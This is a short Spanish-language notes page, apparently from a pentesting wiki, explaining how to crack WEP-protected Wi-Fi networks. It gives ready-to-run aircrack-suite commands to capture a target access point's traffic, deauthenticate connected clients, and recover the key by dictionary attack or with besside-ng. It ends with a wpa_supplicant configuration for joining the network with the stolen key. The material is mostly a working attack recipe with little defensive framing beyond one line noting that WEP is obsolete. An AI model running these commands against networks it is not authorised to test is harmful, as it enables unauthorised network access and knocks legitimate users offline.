Comment on page
WEP
Al usar RC4 con claves de 64bits o 128bits para cifrar las comunicaciones, es declarado vulnerable y obsoleto desde 2003, que fue sustituido por WPA, por lo que es altamente recomendable no usar estas redes.
En primer lugar tenemos que identificar el BSSID del punto de acceso, de forma que interceptamos el tráfico de este punto de acceso.
Hay varias formas de obtener la contraseña de la red:
- 1.Con clientes conectados
airodump-ng -band abg -b [BSSID] -c [canal] -w escaneo [wlan0mon]
Para generar más tráfico, podemos desautenticar a los clientes conectados
aireplay-ng -0 0 -a [BSSID] [wlan0mon]
Una vez hemos capturado tr áfico durante un tiempo relevante,
aircrack-ng escaneo-01.cap -w [rutaDiccionario]
- 2.Con besside-ng
airmon-ng check kill
besside-ng -c [canal] -b [BSSID] [wlan1] -v
Teniendo la contraseña de la red podemos conectarnos generando el fichero de configuración de la red "wpa_supplicant_ESSID.conf"
network={
ssid=[ESSID] // el nombre de la red
key_mgmt=NONE
wep_key0=[PASSWORD] // la contraseña de la red
wep_tx_keyidx=0
}
Para conectarnos a la red usaremos
wpa_supplicant -c [wpa_supplicant_ESSID.conf] -i [wlan1]
Last modified 1mo ago